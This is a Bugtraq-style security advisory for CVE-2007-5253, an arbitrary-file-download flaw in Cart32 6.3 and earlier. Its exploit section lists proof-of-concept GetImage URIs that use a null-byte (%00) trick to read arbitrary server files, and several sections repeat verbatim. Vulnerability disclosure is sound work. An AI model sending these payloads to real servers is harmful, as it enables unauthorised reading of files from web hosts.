Cart32 GetImage Arbitrary File Download Vulnerability
BID:25928
Info
Cart32 GetImage Arbitrary File Download Vulnerability
| Bugtraq ID: | 25928 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-5253 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 04 2007 12:00AM |
| Updated: | May 07 2015 05:35PM |
| Credit: | Paul Craig is credited with the discovery of this vulnerability. |
| Vulnerable: |
McMurtrey/Whitaker & Associates Cart32 6.3 McMurtrey/Whitaker & Associates Cart32 6.2 McMurtrey/Whitaker & Associates Cart32 6.1 |
| Not Vulnerable: |
McMurtrey/Whitaker & Associates Cart32 6.4 |
Discussion
Cart32 GetImage Arbitrary File Download Vulnerability
Cart32 is prone to an arbitrary-file-download vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the webserver process. Information obtained may aid in further attacks.
This issue affects Cart32 6.3; prior versions are also vulnerable.
Cart32 is prone to an arbitrary-file-download vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the webserver process. Information obtained may aid in further attacks.
This issue affects Cart32 6.3; prior versions are also vulnerable.
Exploit / POC
Cart32 GetImage Arbitrary File Download Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.gif
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.jpg
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.pdf
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.png
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.gif
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.jpg
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.pdf
http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.png
Solution / Fix
Cart32 GetImage Arbitrary File Download Vulnerability
Solution:
The vendor released an update to address this issue. Please contact the vendor for information on how to obtain and apply this update.
Solution:
The vendor released an update to address this issue. Please contact the vendor for information on how to obtain and apply this update.
References
Cart32 GetImage Arbitrary File Download Vulnerability
References:
References:
- Cart32 Arbitrary File Download Vulnerability ([email protected])
- Cart32 Homepage (McMurtrey/Whitaker & Associates)